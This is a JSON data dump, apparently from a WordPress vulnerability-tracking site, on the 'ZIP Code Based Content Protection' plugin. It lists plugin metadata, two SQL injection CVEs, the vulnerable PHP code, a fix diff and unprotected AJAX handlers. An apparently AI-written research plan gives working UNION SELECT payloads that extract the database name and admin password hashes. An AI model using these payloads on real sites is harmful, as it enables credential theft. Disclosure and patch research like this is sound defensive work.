[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fe3wb7dxI75RsZYa0F44KaetYpIPEThdaHIL2F3OGTsk":3,"$fJhH1b-NLRLatUovptEhI1lVvoeaYn54TmIwcPd0_FYo":510,"$fptDGSRRVinXQ43BwEb-vEuoB-m11d9ocAOnCbfzMuAk":514},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":21,"download_link":22,"security_score":23,"vuln_count":24,"unpatched_count":13,"last_vuln_date":25,"fetched_at":26,"discovery_status":27,"vulnerabilities":28,"developer":80,"crawl_stats":34,"alternatives":88,"analysis":192,"fingerprints":489},"zip-code-based-content-protection","ZIP Code Based Content Protection","1.0.3","PressTigers","https:\u002F\u002Fprofiles.wordpress.org\u002Fpresstigers\u002F","\u003Cp>ZIP Code Based Content Protection comes in handy when you want the visitor to input ZIP Code before showing them any kind of content. And the content will be shown if that certain ZIP Code is allowed for that particular content.\u003C\u002Fp>\n\u003Cp>Situations like when you want to show details of a community meeting, promotions and offers on a certain service, event details etc or any kind of content which the admin wants the user to go through by entering the allowed ZIP Code, ZBCP can assist.\u003C\u002Fp>\n\u003Cp>Below are some salient features:\u003C\u002Fp>\n\u003Ch3>ZBCP Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Simple to use\u003C\u002Fli>\n\u003Cli>100% responsive\u003C\u002Fli>\n\u003Cli>Can be enabled on all available post types\u003C\u002Fli>\n\u003Cli>Custom message settings\u003C\u002Fli>\n\u003Cli>Can track most requested ZIP Codes\u003C\u002Fli>\n\u003Cli>Custom ZIP Codes\u003C\u002Fli>\n\u003Cli>Track visitor email addresses\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>As we continue to strive for perfection further features will be added in future updates.\u003C\u002Fp>\n\u003Ch4>DO YOU WANT TO CONTRIBUTE?\u003C\u002Fh4>\n\u003Cp>If you have ideas that can help us improve our plugin and user experience, please contact us at support@presstigers.com\u003C\u002Fp>\n","ZIP Code Based Content Protection comes in handy when you want the visitor to input ZIP Code before showing them any kind of content.",10,3514,0,"2026-02-19T10:41:00.000Z","6.9.4","6.0","7.4",[19,20,4],"content-limitations","private-content","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fzipcode-based-content-protection","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fzip-code-based-content-protection.1.0.3.zip",96,2,"2026-03-06 11:52:34","2026-04-16T10:56:18.058Z","no_bundle",[29,64],{"id":30,"url_slug":31,"title":32,"description":33,"plugin_slug":4,"theme_slug":34,"affected_versions":35,"patched_in_version":6,"severity":36,"cvss_score":37,"cvss_vector":38,"vuln_type":39,"published_date":25,"updated_date":40,"references":41,"days_to_patch":43,"patch_diff_files":44,"patch_trac_url":34,"research_status":53,"research_verified":54,"research_rounds_completed":55,"research_plan":56,"research_summary":57,"research_vulnerable_code":58,"research_fix_diff":59,"research_exploit_outline":60,"research_model_used":61,"research_started_at":62,"research_completed_at":63,"research_error":34,"poc_status":34,"poc_video_id":34,"poc_summary":34,"poc_steps":34,"poc_tested_at":34,"poc_wp_version":34,"poc_php_version":34,"poc_playwright_script":34,"poc_exploit_code":34,"poc_has_trace":54,"poc_model_used":34,"poc_verification_depth":34},"CVE-2025-14353","zip-code-based-content-protection-unauthenticated-sql-injection-via-zipcode-parameter","ZIP Code Based Content Protection \u003C= 1.0.2 - Unauthenticated SQL Injection via 'zipcode' Parameter","The ZIP Code Based Content Protection plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 via the 'zipcode' parameter. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",null,"\u003C=1.0.2","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-07 01:21:22",[42],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F8aeaba0e-0a23-48f6-aa42-7f2f3bd741f1?source=api-prod",1,[45,46,47,48,49,50,51,52],"README.txt","admin\u002Fclass-zipcode-bcp-admin.php","admin\u002Fjs\u002Fzipcode-bcp-admin.js","admin\u002Flists\u002Fclass-zipcode-bcp-admin-requested-zipcodes.php","admin\u002Flists\u002Fclass-zipcode-bcp-admin-user-requested-zipcodes.php","admin\u002Flists\u002Fclass-zipcode-bcp-admin-zipcodes-list.php","admin\u002Fmetas\u002Fclass-zipcode-bcp-admin-post-page-meta.php","admin\u002Fsettings\u002Fclass-zipcode-bcp-admin-settings.php","researched",false,3,"This research plan focuses on exploiting a SQL injection vulnerability in the **ZIP Code Based Content Protection** plugin for WordPress.\n\n## 1. Vulnerability Summary\nThe vulnerability is an unauthenticated SQL injection in the `zip_code` parameter handled by the `Zipcode_BCP_Admin` class. The flaw exists in multiple AJAX handlers (`export_registered_users_in_zipcode`, `preview_registered_users_in_zipcode`, and `view_posts_registered_users_in_zipcode`). \n\nThe code uses `sanitize_text_field()` on the input, which does not escape single quotes, and then interpolates the variable directly into a query string. Critically, it then calls `$wpdb->prepare()` on the *already-interpolated* query string while passing an empty string as the second argument. This fails to provide any parameterization for the user input, allowing an attacker to break out of the string literal and append arbitrary SQL.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `export_registered_users_in_zipcode` (and variants)\n- **HTTP Parameter**: `zip_code` (via `$_REQUEST`)\n- **Authentication**: Unauthenticated (as per CVE description; the plugin hooks these actions to `wp_ajax_nopriv_*` to allow unauthenticated users to export\u002Fpreview data if they have requested zip codes).\n- **Vulnerability Type**: UNION-Based SQL Injection.\n\n## 3. Code Flow\n1.  **Entry Point**: A `POST` request is sent to `admin-ajax.php` with `action=export_registered_users_in_zipcode`.\n2.  **Dispatch**: WordPress triggers the hook `wp_ajax_nopriv_export_registered_users_in_zipcode`, which calls `Zipcode_BCP_Admin::zbcp_export_registered_users_in_zipcode()`.\n3.  **Vulnerable Function** (`admin\u002Fclass-zipcode-bcp-admin.php`):\n    -   `$zipcode = sanitize_text_field( $_REQUEST['zip_code'] );` (Input is retrieved but not SQL-escaped).\n    -   `$pt_query = \"SELECT * FROM $table WHERE zipcode = '$zipcode'\";` (Input interpolated into query).\n4.  **SQL Sink**: \n    -   `$users = $wpdb->get_results( $wpdb->prepare( $pt_query, '' ), ARRAY_A );`\n    -   The `prepare` call does nothing because the query is already built and the argument is empty.\n5.  **Output**: The results are iterated, and the `user_email` field is echoed:\n    ```php\n    echo \"email\\n\";\n    foreach ( $users as $user ) :\n        echo esc_attr($user['user_email']) . \"\\n\";\n    endforeach;\n    ```\n\n## 4. Nonce Acquisition Strategy\nBased on the analysis of `admin\u002Fjs\u002Fzipcode-bcp-admin.js` and `admin\u002Fclass-zipcode-bcp-admin.php`:\n- **No Nonce Required**: The AJAX requests in `zipcode-bcp-admin.js` for these specific actions (`export_registered_users_in_zipcode`, etc.) do not include any security tokens or nonces in the `data` object.\n- **Missing Server-Side Check**: The PHP handlers in `class-zipcode-bcp-admin.php` do not call `check_ajax_referer()` or `wp_verify_nonce()`.\n\nTherefore, the exploit can be executed directly without any prior nonce acquisition.\n\n## 5. Exploitation Strategy\nWe will use a UNION SELECT payload to extract the database name and the admin user's password hash.\n\n### Step 1: Identify Column Count\nThe table `{$wpdb->prefix}zipcode_requested_users` contains 6 columns (verified from `admin\u002Flists\u002Fclass-zipcode-bcp-admin-user-requested-zipcodes.php`):\n1. `id`\n2. `zipcode`\n3. `user_email` (Reflected in `export_registered_users_in_zipcode`)\n4. `post_id`\n5. `post_type`\n6. `post_title`\n\n### Step 2: Extract Data via `export_registered_users_in_zipcode`\nWe will target the 3rd column (`user_email`) because it is enqueued in the output loop.\n\n**HTTP Request:**\n- **URL**: `{{target_url}}\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**: \n  ```text\n  action=export_registered_users_in_zipcode&zip_code=1' UNION SELECT 1,2,CONCAT(0x5b53514c495d,DATABASE(),0x3a,user_login,0x3a,user_pass,0x5b53514c495d),4,5,6 FROM wp_users-- -\n  ```\n  *(Note: `0x5b53514c495d` is the hex for `[SQLI]` to make parsing easy).*\n\n## 6. Test Data Setup\n1.  **Plugin Activation**: Ensure the plugin \"ZIP Code Based Content Protection\" is installed and activated.\n2.  **Table Creation**: The plugin must have created its tables. This usually happens on activation.\n3.  **Administrator**: Ensure at least one administrator exists in `wp_users` (standard for any WP install).\n\n## 7. Expected Results\nThe response should be a text\u002Fcsv-like output:\n```text\nemail\n[SQLI]wordpress_db:admin:$P$B...[SQLI]\n```\nThe presence of the database name and hash confirms successful extraction.\n\n## 8. Verification Steps\n1.  **Database Check**: Use `wp db query \"SELECT user_pass FROM wp_users WHERE user_login='admin'\"` via WP-CLI to compare the hash retrieved via the exploit.\n2.  **Table Check**: Verify the table exists: `wp db query \"SHOW TABLES LIKE '%zipcode_requested_users%'\"`.\n\n## 9. Alternative Approaches\nIf `export_registered_users_in_zipcode` fails to produce output due to character encoding in the CSV flow, use the JSON-based endpoint:\n\n**Alternative Action**: `preview_registered_users_in_zipcode`\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body**: `action=preview_registered_users_in_zipcode&zip_code=1' UNION SELECT 1,2,DATABASE(),4,5,6-- -`\n- **Response**: A JSON object where `result` contains the extracted data inside `\u003Cp>` tags:\n  ```json\n  {\"status\":true,\"result\":\"\u003Cp>database_name\u003C\\\u002Fp>\\n\"}\n  ```\n\nIf `sanitize_text_field` interferes with complex payloads (like subqueries), use hex encoding for strings to avoid quotes entirely.","The ZIP Code Based Content Protection plugin for WordPress is vulnerable to unauthenticated UNION-based SQL injection via the 'zip_code' parameter in several AJAX actions. This occurs because user input is interpolated directly into SQL query strings before being passed to a non-functional $wpdb->prepare() call, allowing attackers to extract sensitive data from the database.","\u002F\u002F admin\u002Fclass-zipcode-bcp-admin.php:118\npublic function zbcp_export_registered_users_in_zipcode() {\n    if ( ! empty( $_REQUEST['zip_code'] ) ) {\n\n        global $wpdb;\n        $table   = $wpdb->get_blog_prefix() . 'zipcode_requested_users';\n        $zipcode = sanitize_text_field( $_REQUEST['zip_code'] );\n\n        $pt_query = \"SELECT * FROM $table WHERE zipcode = '$zipcode'\";\n        $users    = $wpdb->get_results( $wpdb->prepare( $pt_query, '' ), ARRAY_A );\n\n---\n\n\u002F\u002F admin\u002Fclass-zipcode-bcp-admin.php:133\nfunction zbcp_preview_registered_users_in_zipcode() {\n    if ( ! empty( $_REQUEST['zip_code'] ) ) {\n        global $wpdb;\n        $table   = $wpdb->get_blog_prefix() . 'zipcode_requested_users';\n        $zipcode = sanitize_text_field( $_REQUEST['zip_code'] );\n\n        $pt_query = \"SELECT * FROM $table WHERE zipcode = '$zipcode'\";\n        $users    = $wpdb->get_results( $wpdb->prepare( $pt_query, '' ), ARRAY_A );","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fzip-code-based-content-protection\u002F1.0.1\u002Fadmin\u002Fclass-zipcode-bcp-admin.php\t2025-09-09 12:59:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fzip-code-based-content-protection\u002F1.0.3\u002Fadmin\u002Fclass-zipcode-bcp-admin.php\t2026-02-19 10:41:48.000000000 +0000\n@@ -113,29 +88,56 @@\n \t\tif ( ! empty( $_REQUEST['zip_code'] ) ) {\n \n \t\t\tglobal $wpdb;\n-\t\t\t$table   = $wpdb->get_blog_prefix() . 'zipcode_requested_users';\n-\t\t\t$zipcode = sanitize_text_field( $_REQUEST['zip_code'] );\n+\t\t\t$table = $wpdb->prefix . 'zipcode_requested_users';\n+\n+\t\t\t\u002F\u002F Get and sanitize ZIP code.\n+\t\t\t$zipcode = sanitize_text_field( wp_unslash( $_REQUEST['zip_code'] ) );\n \n-\t\t\t$pt_query = \"SELECT * FROM $table WHERE zipcode = '$zipcode'\";\n-\t\t\t$users    = $wpdb->get_results( $wpdb->prepare( $pt_query, '' ), ARRAY_A );\n+\t\t\tif ( empty( $zipcode ) ) {\n+\t\t\t\texit();\n+\t\t\t}\n \n+\t\t\t\u002F\u002F Prepare query safely.\n+\t\t\t$query = $wpdb->prepare(\n+\t\t\t\t\"SELECT user_email FROM {$table} WHERE zipcode = %s\",\n+\t\t\t\t$zipcode\n+\t\t\t);\n+\n+\t\t\t\u002F\u002F Fetch results.\n+\t\t\t$users = $wpdb->get_results( $query, ARRAY_A );","The exploit targets unauthenticated AJAX handlers like 'export_registered_users_in_zipcode' or 'preview_registered_users_in_zipcode'. An attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to one of the vulnerable hooks and a 'zip_code' parameter containing a SQL payload. Because sanitize_text_field() does not escape single quotes and the query string is pre-interpolated before being passed to $wpdb->prepare() with an empty argument, an attacker can use a UNION SELECT statement to jump out of the 'zipcode' string literal. By determining the column count of the target table, the attacker can reflect results (such as admin password hashes or the database name) directly into the response, which is returned either as plain text\u002FCSV or JSON depending on the action hit.","gemini-3-flash-preview","2026-04-18 05:35:36","2026-04-18 05:36:02",{"id":65,"url_slug":66,"title":67,"description":68,"plugin_slug":4,"theme_slug":34,"affected_versions":69,"patched_in_version":70,"severity":71,"cvss_score":72,"cvss_vector":73,"vuln_type":39,"published_date":74,"updated_date":75,"references":76,"days_to_patch":78,"patch_diff_files":79,"patch_trac_url":34,"research_status":34,"research_verified":54,"research_rounds_completed":13,"research_plan":34,"research_summary":34,"research_vulnerable_code":34,"research_fix_diff":34,"research_exploit_outline":34,"research_model_used":34,"research_started_at":34,"research_completed_at":34,"research_error":34,"poc_status":34,"poc_video_id":34,"poc_summary":34,"poc_steps":34,"poc_tested_at":34,"poc_wp_version":34,"poc_php_version":34,"poc_playwright_script":34,"poc_exploit_code":34,"poc_has_trace":54,"poc_model_used":34,"poc_verification_depth":34},"CVE-2025-59008","zip-code-based-content-protection-authenticated-administrator-sql-injection","ZIP Code Based Content Protection \u003C= 1.0.0 - Authenticated (Administrator+) SQL Injection","The ZIP Code Based Content Protection plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","\u003C=1.0.0","1.0.1","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","2025-09-08 00:00:00","2025-09-16 14:57:24",[77],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F890aeff2-47f2-4377-879e-2254d45312dd?source=api-prod",9,[],{"slug":81,"display_name":7,"profile_url":8,"plugin_count":82,"total_installs":83,"avg_security_score":84,"avg_patch_time_days":85,"trust_score":86,"computed_at":87},"presstigers",12,32330,84,317,68,"2026-05-19T15:16:12.795Z",[89,111,134,153,173],{"slug":90,"name":91,"version":92,"author":93,"author_profile":94,"description":95,"short_description":96,"active_installs":97,"downloaded":98,"rating":99,"num_ratings":100,"last_updated":101,"tested_up_to":15,"requires_at_least":102,"requires_php":103,"tags":104,"homepage":108,"download_link":109,"security_score":23,"vuln_count":55,"unpatched_count":13,"last_vuln_date":110,"fetched_at":26},"client-portal","Client Portal – Private user pages and login","1.2.2","madalin.ungureanu","https:\u002F\u002Fprofiles.wordpress.org\u002Fmadalinungureanu\u002F","\u003Cp>The \u003Ca href=\"https:\u002F\u002Fwww.cozmoslabs.com\u002Fadd-ons\u002Fclient-portal\u002F\" rel=\"nofollow ugc\">WordPress Client Portal plugin\u003C\u002Fa> creates private pages for each user. The content for that page is accessible  on the frontend only by the owner of the page\u003Cbr \u002F>\nafter he has logged in.\u003C\u002Fp>\n\u003Cp>The plugin doesn’t offer a login or registration form and it gives you the possibility to use a plugin of your choice.\u003C\u002Fp>\n\u003Cp>The \u003Cstrong>[client-portal]\u003C\u002Fstrong> shortcode can be added to any page and when the logged in user will access that page he will be redirected to its private page.\u003C\u002Fp>\n\u003Cp>For login and registration of users we recommend the free \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fprofile-builder\u002F\" rel=\"ugc\">Profile Builder\u003C\u002Fa> plugin.\u003C\u002Fp>\n\u003Cp>You can then use the [wppb-login] shortcode in the same page as the [client-portal] shortcode.\u003C\u002Fp>\n","WordPress Client Portal Plugin that creates private pages for all users that only an administrator can edit.",3000,145271,86,23,"2026-01-22T09:22:00.000Z","3.1","",[90,105,20,106,107],"private-client-page","private-pages","private-user-page","http:\u002F\u002Fwww.cozmoslabs.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclient-portal.1.2.2.zip","2026-01-16 00:00:00",{"slug":112,"name":113,"version":114,"author":115,"author_profile":116,"description":117,"short_description":118,"active_installs":119,"downloaded":120,"rating":121,"num_ratings":122,"last_updated":123,"tested_up_to":124,"requires_at_least":125,"requires_php":103,"tags":126,"homepage":131,"download_link":132,"security_score":133,"vuln_count":13,"unpatched_count":13,"last_vuln_date":34,"fetched_at":26},"lh-private-content-login","LH Private Content Login","1.05","shawfactor","https:\u002F\u002Fprofiles.wordpress.org\u002Fshawfactor\u002F","\u003Cp>Do you post private content? Are you sending those links to your users with private content access?\u003C\u002Fp>\n\u003Cp>WordPress natively send non-logged in users to a 404 (content not found) page when they try to access a post, page, or cpt without rights. This plugin redirects those users to the login page. After successful login the user is then redirected back to the post, page, or cpt they were trying to access.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Like this plugin? Please consider \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fview\u002Fplugin-reviews\u002Flh-private-content-login\u002F\" rel=\"ugc\">leaving a 5-star review\u003C\u002Fa>.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Love this plugin or want to help the LocalHero Project? Please consider \u003Ca href=\"https:\u002F\u002Flhero.org\u002Fportfolio\u002Flh-private-content-login\u002F\" rel=\"nofollow ugc\">making a donation\u003C\u002Fa>.\u003C\u002Fstrong>\u003C\u002Fp>\n","Redirects non-logged users to the login page when they follow a link to a post, page, or cpt which is protected by post status.",300,5908,100,5,"2024-02-28T04:08:00.000Z","6.4.8","5.0",[127,128,20,129,130],"login","post-status","redirection","status","https:\u002F\u002Flhero.org\u002Fportfolio\u002Flh-private-content-login\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flh-private-content-login.zip",85,{"slug":135,"name":136,"version":137,"author":138,"author_profile":139,"description":140,"short_description":141,"active_installs":142,"downloaded":143,"rating":121,"num_ratings":55,"last_updated":144,"tested_up_to":145,"requires_at_least":146,"requires_php":103,"tags":147,"homepage":151,"download_link":152,"security_score":133,"vuln_count":13,"unpatched_count":13,"last_vuln_date":34,"fetched_at":26},"private-file-for-woocommerce","Private File for Woocommerce","1.0.4","Roberto Bottalico","https:\u002F\u002Fprofiles.wordpress.org\u002F4wpbari\u002F","\u003Cp>Consente di poter inviare ai tuoi clienti file privati, pagine private ed una pagina condivisa, nella sezione my account di woocommerce nell’area clienti\u003C\u002Fp>\n\u003Ch3>Descrizione\u003C\u002Fh3>\n\u003Cp>Private File For Woocommerce è un semplice ma utilissimo plugin che permette di poter allegare file in modo totalmente privato direttamente al singolo cliente, che lo potrà scaricare\u003Cbr \u002F>\nnella sezione privato nell’account di woocommerce.\u003C\u002Fp>\n\u003Ch4>Che cosa permette di fare?\u003C\u002Fh4>\n\u003Cp>Il plugin è un fork del cuore principale di \u003Ca href=\"https:\u002F\u002Fit.wordpress.org\u002Fplugins\u002Fcustomer-area\u002F\" rel=\"nofollow ugc\">Wp Customer Area\u003C\u002Fa> versione 1.6 -THANKS E CREDIT – assemblato nelle funzionalità di woocommerce.\u003C\u002Fp>\n\u003Cp>Oltre a file privati, permette anche di inserire pagine private per singolo cliente, ed infine permette di poter inserire una sola pagina condivisa con tutti i clienti, sempre nell’area clienti.\u003C\u002Fp>\n\u003Cp>Come funziona il plugin?\u003Cbr \u002F>\nUna volta attivato, di default è impostato per inserire i file. Potete attivare in backend con il flag anche le altre sezioni direttamente in PRIVATE FILE FOR WOOCOMMERCE\u002FIMPOSTAZIONI.\u003Cbr \u002F>\nUna volta attivato, in frontend invece verranno inserite due sezioni in my account di woocommerce nell’area riservata del cliente\u003Cbr \u002F>\nSEZ.CONDIVISA=una pagina condivisa con tutti i clienti\u003Cbr \u002F>\nSEZ.PRIVATA=infiniti file privati o pagine private al singolo cliente\u003C\u002Fp>\n\u003Cp>Le sezioni possono essere attivate\u002Fdisattivate singolarmente, in base alle proprie esigenze\u003C\u002Fp>\n\u003Cp>Il plugin funziona su tutti i temi, non avrai problemi di incompatibilità o conflitti.\u003C\u002Fp>\n\u003Cp>Protezione perfetta dei file, nessun direct link per il download neanche se l’utente è loggato e verrebbe a conoscenza del link del file di un altro utente.\u003C\u002Fp>\n\u003Cp>Plugin pratico, intuitivo e leggero.\u003C\u002Fp>\n\u003Cp>Spero che soddisfi le vostre esigenze, buon lavoro a tutti.\u003C\u002Fp>\n\u003Cp>Note:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Il plugin richiede Woocommerce.\u003C\u002Fli>\n\u003Cli>La dimensione dei file singoli da allegare è in base al vostro hosting. (media max 20mb)\u003C\u002Fli>\n\u003Cli>Il plugin non permette la cancellazione del file caricato dal pannello, ma cancellabile solo in ftp\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Installazione\u003C\u002Fh3>\n\u003Cp>Puoi caricare il file zip da Plugin\u002FAggiungi Nuovo, dal pannello di amministrazione del tuo wordpress\u003Cbr \u002F>\noppure\u003Cbr \u002F>\nEstrai il file zip e rilascia il contenuto nella directory wp-content \u002F plugins \u002F della tua installazione di WordPress, quindi attiva la pagina Plugin da Plugins.\u003C\u002Fp>\n","Consente di poter inviare ai tuoi clienti file privati, pagine private ed una pagina condivisa, nella sezione my account di woocommerce nell'area &hellip;",80,2516,"2022-02-17T17:27:00.000Z","5.9.13","4.9",[148,20,149,150],"myaccount-woocommerce","private-file","woocommerce","https:\u002F\u002Fwww.4wp.it","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprivate-file-for-woocommerce.zip",{"slug":154,"name":155,"version":156,"author":157,"author_profile":158,"description":159,"short_description":160,"active_installs":11,"downloaded":161,"rating":13,"num_ratings":13,"last_updated":162,"tested_up_to":163,"requires_at_least":164,"requires_php":165,"tags":166,"homepage":171,"download_link":172,"security_score":133,"vuln_count":13,"unpatched_count":13,"last_vuln_date":34,"fetched_at":26},"advision-private-area","Advision Private Area","0.0.2","Marco","https:\u002F\u002Fprofiles.wordpress.org\u002Fmarcopappalardo\u002F","\u003Cp>This simple plugin allow you manage easily your audience like Customers, Sellers, Employers or anyone else.\u003Cbr \u002F>\nYou can share files like documents, bills, notices or other to each person you need. They will get a private area where they will found anything you share with their.\u003C\u002Fp>\n\u003Cp>How to use this plugin:\u003Cbr \u002F>\n– Choose the page where you want to display the private area of each customer and just copy and paste this shortcode [adv_reserved_area]\u003Cbr \u002F>\n– Refresh your permalinks\u003Cbr \u002F>\n– After you install the plugin a new user role “Site Manager” will create. You can assign it to each user who should be add new content to your audience.\u003Cbr \u002F>\n– You can also easily manage the role capabilities by other plugins like “User role manager”.\u003Cbr \u002F>\n– All users with subscriber role can have access to their private area.\u003Cbr \u002F>\n– The whole plugin is wpml compatible. This consento to you an easy and fast translation in your language.\u003C\u002Fp>\n","Manage private contents for your customers, sellers, employer or everyone you need. Upload documents, notices or other files to your audience.",1355,"2021-01-22T10:39:00.000Z","5.6.17","4.0","4.6",[167,168,169,170,20],"client-area","customer-area","member-area","private-area","http:\u002F\u002Fwww.advisionplus.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvision-private-area.zip",{"slug":174,"name":175,"version":176,"author":177,"author_profile":178,"description":179,"short_description":180,"active_installs":11,"downloaded":181,"rating":121,"num_ratings":43,"last_updated":182,"tested_up_to":183,"requires_at_least":184,"requires_php":103,"tags":185,"homepage":190,"download_link":191,"security_score":133,"vuln_count":13,"unpatched_count":13,"last_vuln_date":34,"fetched_at":26},"content-permissions-for-pages-posts","Content Permissions for Pages & Posts","1.0","param","https:\u002F\u002Fprofiles.wordpress.org\u002Fparamsheoran\u002F","\u003Cblockquote>\n\u003Cp>Control your content based on logged in users, guests roles. Hide the content and show message to ask them to login.\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>Hide complete page content, post content with simple use of shortcode and your content inside this.\u003Cbr \u002F>\n  Special option to display the content only to guests, only to logged in users etc.\u003C\u002Fp>\n\u003Cp>The Plugin enable you to value your content and distribute your content based on login or guest.\u003Cbr \u002F>\n  Simple Shortcode to use , No Code, No Development Knowledge required.\u003C\u002Fp>\n\u003Ch4>Shortcode list:\u003C\u002Fh4>\n\u003Col>\n\u003Cli>\n\u003Cp>[cpp_guests] Your content to display for guest only. [\u002Fcpp_guests]\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>[cpp_users]  Display content for users\u002Fmembers\u002Flogged in only. [\u002Fcpp_users]\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Fol>\n","Control your content permissions with simple shortcode. Restrict content access to members,guests or logged in one's.",1398,"2017-11-17T09:48:00.000Z","4.8.28","3.0",[186,187,20,188,189],"content-permissions","members","restrict-content","restrict-guest","https:\u002F\u002Fprofiles.wordpress.org\u002Fparamsheoran","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcontent-permissions-for-pages-posts.zip",{"attackSurface":193,"codeSignals":300,"taintFlows":362,"riskAssessment":472,"analyzedAt":488},{"hooks":194,"ajaxHandlers":267,"restRoutes":297,"shortcodes":298,"cronEvents":299,"entryPointCount":11,"unprotectedCount":11},[195,201,206,210,213,216,219,222,225,227,231,234,236,238,241,244,247,250,252,255,258,261,263],{"type":196,"name":197,"callback":198,"priority":11,"file":199,"line":200},"filter","set-screen-option","set_screen","admin\\lists\\class-zipcode-bcp-admin-requested-zipcodes.php",350,{"type":202,"name":203,"callback":204,"file":199,"line":205},"action","admin_menu","register_menu",351,{"type":202,"name":207,"callback":208,"file":199,"line":209},"plugins_loaded","get_instance",428,{"type":196,"name":197,"callback":198,"priority":11,"file":211,"line":212},"admin\\lists\\class-zipcode-bcp-admin-user-requested-zipcodes.php",339,{"type":202,"name":203,"callback":214,"file":211,"line":215},"zbcp_user_req_lists_menu",340,{"type":202,"name":207,"callback":217,"file":211,"line":218},"closure",410,{"type":196,"name":197,"callback":198,"priority":11,"file":220,"line":221},"admin\\lists\\class-zipcode-bcp-admin-zipcodes-list.php",292,{"type":202,"name":203,"callback":223,"file":220,"line":224},"zbcp_lists_menu",293,{"type":202,"name":207,"callback":217,"file":220,"line":226},449,{"type":202,"name":207,"callback":228,"file":229,"line":230},"anonymous","includes\\class-zipcode-bcp.php",164,{"type":202,"name":232,"callback":228,"file":229,"line":233},"admin_enqueue_scripts",178,{"type":202,"name":232,"callback":228,"file":229,"line":235},179,{"type":202,"name":203,"callback":228,"file":229,"line":237},191,{"type":202,"name":239,"callback":228,"file":229,"line":240},"admin_init",192,{"type":202,"name":242,"callback":228,"file":229,"line":243},"add_meta_boxes",196,{"type":202,"name":245,"callback":228,"file":229,"line":246},"save_post",197,{"type":202,"name":248,"callback":228,"file":229,"line":249},"wp_enqueue_scripts",211,{"type":202,"name":248,"callback":228,"file":229,"line":251},212,{"type":202,"name":253,"callback":228,"file":229,"line":254},"init",217,{"type":196,"name":256,"callback":228,"file":229,"line":257},"query_vars",218,{"type":196,"name":259,"callback":228,"file":229,"line":260},"template_redirect",219,{"type":196,"name":259,"callback":228,"file":229,"line":262},220,{"type":196,"name":264,"callback":217,"file":265,"line":266},"template_include","public\\class-zipcode-bcp-public.php",138,[268,271,274,277,280,283,286,289,292,295],{"action":269,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":270},"export_registered_users_in_zipcode",182,{"action":272,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":273},"preview_registered_users_in_zipcode",183,{"action":275,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":276},"view_posts_registered_users_in_zipcode",184,{"action":278,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":279},"insert_zipcode_into_database",185,{"action":281,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":282},"insert_multiple_zipcode_into_database",186,{"action":284,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":285},"get_zipcode_from_api",187,{"action":287,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":288},"check_zipcode_from_post_page_meta",213,{"action":287,"nopriv":290,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":291},true,214,{"action":293,"nopriv":54,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":294},"submit_email_against_zipcode",215,{"action":293,"nopriv":290,"callback":228,"hasNonce":54,"hasCapCheck":54,"file":229,"line":296},